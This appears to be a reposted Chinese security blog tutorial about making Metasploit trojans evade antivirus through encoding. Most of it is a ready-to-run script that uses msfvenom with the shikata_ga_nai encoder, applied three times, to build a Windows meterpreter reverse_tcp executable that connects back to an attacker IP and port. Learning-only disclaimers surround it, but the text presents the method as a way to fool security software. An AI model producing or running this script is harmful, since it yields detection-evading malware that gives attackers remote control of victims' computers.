MSF(3)免杀混淆

admin 2025年5月14日15:48:23评论4 views字数 767阅读2分33秒阅读模式

声明!本文章所有的工具分享仅仅只是供大家学习交流为主,切勿用于非法用途,如有任何触犯法律的行为,均与本人及团队无关!!!

一、前言

前面说了木马的捆绑,dll,exe,hta等密码,但是木马落地就容易被杀软检测直接隔离了,本章节主要讲我们要怎么对木马进行一个简单的混淆,进行一个简单的免杀。

二、免杀的原理

免杀的原理就是混淆,加密把木马的代码改的杀软检测不出特征,但是计算机又能执行,骗过杀毒软件,就算是免杀成功了。那么msf这个工具当中呢有大量的混淆加密的模块供攻击者去使用,可能这些模块现在过杀毒的效果很差(因为杀软厂家的针对)但是聊胜于无吧,主要给师傅们起到一个学习思路的作用。

三、混淆器参数

1、查看所有混淆器、

msfvenom -l encoder
MSF(3)免杀混淆

2、生成混淆后的木马文件

vim msf_ha.sh
chmod +X msf_ha.sh
./msf_ha.sh
ip=192.168.220.128  #ip地址
port=4444 #端口
arch=x86  #系统框架
platform=windows  #操作系统
format=exe  #格式后缀
encoder=x86/shikata_ga_nai  #调用的混淆模块 
i=3  #混淆次数
payload=windows/meterpreter/reverse_tcp

# use exploit/multi/handler

out=~/Desktop/msf/hx.exe

# 创建目录
mkdir -p "$(dirname "$out")"

msfvenom -p $payload LHOST=$ip LPORT=$port -f $format -e $encoder -i $i -a $arch --platform $platform -o $out
MSF(3)免杀混淆
MSF(3)免杀混淆

原文始发于微信公众号(泷羽SEC-ohh):MSF(3)免杀混淆

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月14日15:48:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   MSF(3)免杀混淆https://cn-sec.com/archives/4061034.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息